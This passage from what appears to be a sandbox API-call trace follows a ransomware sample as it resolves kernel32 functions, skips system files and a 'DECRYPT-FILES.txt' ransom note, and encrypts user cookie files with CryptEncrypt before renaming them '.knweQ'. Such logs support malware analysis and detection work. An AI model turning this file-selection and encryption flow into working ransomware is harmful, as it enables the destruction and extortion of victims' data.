(lpString="CREATEWAITABLETIMERW") returned 20 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.062] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.062] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.062] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.062] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.062] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.062] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.062] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.062] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.062] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.062] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.062] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.063] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.063] lstrlenA (lpString="DELETEATOM") returned 10 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.063] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.063] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.063] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.063] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.063] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.063] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.063] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.063] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.063] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.063] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.063] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.063] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.063] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.063] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.063] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.064] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.064] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.064] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.064] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.064] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.064] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.064] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.064] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.064] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.064] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.064] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.064] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.064] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.064] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.064] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.065] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.065] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.065] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.065] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.065] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.065] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.065] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.065] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt") returned 119 [0079.065] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ") returned 125 [0079.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweq"), dwFlags=0x0) returned 1 [0079.066] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.066] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.066] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.067] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", cAlternateFileName="5P2CBA~1.TXT")) returned 1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="autorun.inf") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="boot.ini") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="desktop.ini") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="ntuser.dat") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="iconcache.db") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="bootsect.bak") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="thumbs.db") returned -1 [0079.067] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="Bootfont.bin") returned -1 [0079.067] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adformdsp[1].txt") returned 37 [0079.067] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.067] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.067] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.067] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.067] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.067] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adformdsp[1].txt") returned 37 [0079.067] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adformdsp[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" [0079.067] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.068] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=93) returned 1 [0079.068] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.068] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.068] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.070] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.070] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.070] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.071] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.071] CloseHandle (hObject=0x464) returned 1 [0079.071] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.071] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.072] CloseHandle (hObject=0x0) returned 0 [0079.072] CloseHandle (hObject=0x460) returned 1 [0079.073] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.073] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.073] GetTickCount () returned 0x114c43a [0079.073] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.074] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.074] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.074] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.074] lstrlenA (lpString="kernel32.dll") returned 12 [0079.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.074] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.074] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.074] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.074] lstrlenA (lpString="ADDATOMA") returned 8 [0079.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.074] lstrlenA (lpString="ADDATOMW") returned 8 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.075] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.075] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.075] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.075] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.075] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.075] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.075] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.075] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.075] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.075] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.075] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.075] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.075] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.075] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.075] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.075] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.076] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.076] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.076] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.076] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.076] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.076] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.076] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.076] lstrcpyA (in: 